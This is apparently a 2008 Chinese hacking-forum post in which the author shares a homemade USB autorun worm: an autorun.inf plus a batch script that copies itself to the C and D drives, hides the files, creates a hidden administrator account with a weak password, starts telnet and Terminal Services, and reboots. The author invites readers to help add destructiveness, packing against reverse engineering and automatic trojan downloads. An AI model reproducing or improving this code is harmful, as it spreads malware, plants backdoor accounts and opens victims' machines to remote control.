标题:
首次利用bat写东东 欢迎大家指导
[打印本页]
作者:
3ast
时间:
2008-8-19 22:25
标题:
首次利用bat写东东 欢迎大家指导
首次利用bat写东东 欢迎大家指导
最近autorun.inf文件似乎很火似的
“引诱“了好多的U盘”下水“哦
查了下原理
自己也想尝试一下
于是先建个autorun.inf写了:
[autorun]
open=sliverG.exe
shell\n=^goodluck^
关于sliverG.exe
我打算先采用bat写成后 再转换成exe然后再加个壳之类的
防止逆向工程 毕竟有”版权“的嘛 嘿嘿[q39]
sliverG.bat文件如下:
@echo off
@copy autorun.inf c:\autorun.inf
@copy autorun.inf d:\autorun.inf
@copy gl.exe c:\sliverG.exe
@copy gl.exe d:\sliverG.exe
@attrib +r +h c:\autorun.inf
@attrib +r +h d:\autorun.inf
@attrib +r +h c:\sliverG.exe
@attrib +r +h d:\sliverG.exe
◎net user sliverG 123 /add
@net localgroup administrators sliverG /add
@net start telnet / Terminal Services 等等
rem 此外还可以写个革盘删除类的命令 不过革盘太混蛋 所以偶不采用
@shutdown -r
================
大家也看到了
这个只是个雏形 根本没什么威力
我们还可以在利用那个传说中的文件夹命名漏洞 把sliverG.exe隐藏进去
然后再在sliverG.exe中加个自启动命令
这样sliverG.exe安全问题就基本解决了
关于net start Terminal Services 这句
说实话 我自己也范嘀咕 这对个人pc似乎没用(xp不支持多人登陆)
net start telnet 这个又要躲过那个什么验证的(榕个有个专门的软件)
所以个人感觉 也没多大的用
还有就是这个传染性不够智能化(根本就是弱智嘛:o ) 有待改进
下面就是破坏性 希望大家给点意见
最后是后门的问题了 最好能自动下载种个木马 这个呢也要大家帮帮忙
(干脆别写了 什么都不会[w10] )
大家有好的建议还可以提出
共同学习嘛 :lol
希望大家多多捧场
踊跃发言
嘎嘎[q37]
有兴趣的还可以加我QQ:463961475
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2